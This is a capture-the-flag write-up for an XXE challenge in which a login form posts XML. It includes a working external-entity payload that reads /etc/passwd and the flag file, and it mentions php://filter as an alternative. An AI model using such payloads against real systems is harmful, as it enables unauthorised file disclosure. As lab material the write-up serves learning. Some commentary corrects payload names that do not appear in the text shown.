Principle
XXE vulnerability
Solution walkthrough
Entering the challenge environment, we are greeted by a login page.
The usual universal SQL injection payloads do nothing and there is no SQL error output, so this probably is not SQL injection.
Looking at the page source reveals the code that sends the login form:
```javascript
function doLogin(){
    var username = $("#username").val();
    var password = $("#password").val();
    if(username == "" || password == ""){
        alert("Please enter the username and password!");
        return;
    }
    // The credentials are concatenated straight into an XML document:
    // whatever is typed into the form becomes part of the XML the server parses.
    var data = "<user><username>" + username + "</username><password>" + password + "</password></user>";
    $.ajax({
        type: "POST",
        url: "doLogin.php",
        contentType: "application/xml;charset=utf-8",   // the body is sent as XML, not as form data
        data: data,
        dataType: "xml",
        anysc: false,   // sic: typo for "async" in the challenge source; jQuery ignores the unknown key
        success: function (result) {
            // The server answers with XML as well: <code> decides success, <msg> is echoed to the page
            var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
            var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
            if(code == "0"){
                $(".msg").text(msg + " login fail!");
            }else if(code == "1"){
                $(".msg").text(msg + " login success!");
            }else{
                $(".msg").text("error:" + msg);
            }
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    });
}
```
The telling detail is the contentType: the login data is posted as application/xml with the username and password spliced directly into the document, so the server must be parsing attacker-controlled XML. That is the classic setup for XXE. The response is XML too, and success is decided by the <code> element while <msg> is echoed back to the page, which gives us a place to read output from. Let's capture a request first.
This format? Let's try XXE.
```xml
<?xml version="1.0"?>
<!DOCTYPE test[
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
<username>
&xxe;
</username>
<password>
asdas
</password>
</user>
```
Two details matter here: the entity must be referenced by the same name it was declared with (a declaration of `ha` followed by a reference to `&nuc;` is a well-formedness error and the parser rejects the whole document), and the resource is loaded through the `file://` wrapper. `php:///etc/passwd` is not a valid PHP stream URL; the `php://` wrapper needs a handler such as `php://filter` or `php://input`. Using `php://filter/read=convert.base64-encode/resource=/etc/passwd` is the usual alternative when the target file contains characters like `<` or `&` that would otherwise break the XML.
-- The contents of /etc/passwd are printed back in the response message.
Then point the entity at the flag file in the root directory (file:///flag) and read it the same way to obtain the flag.
Reference: https://blog.csdn.net/qq_52907838/article/details/118030007
XXE reference: https://xz.aliyun.com/t/3357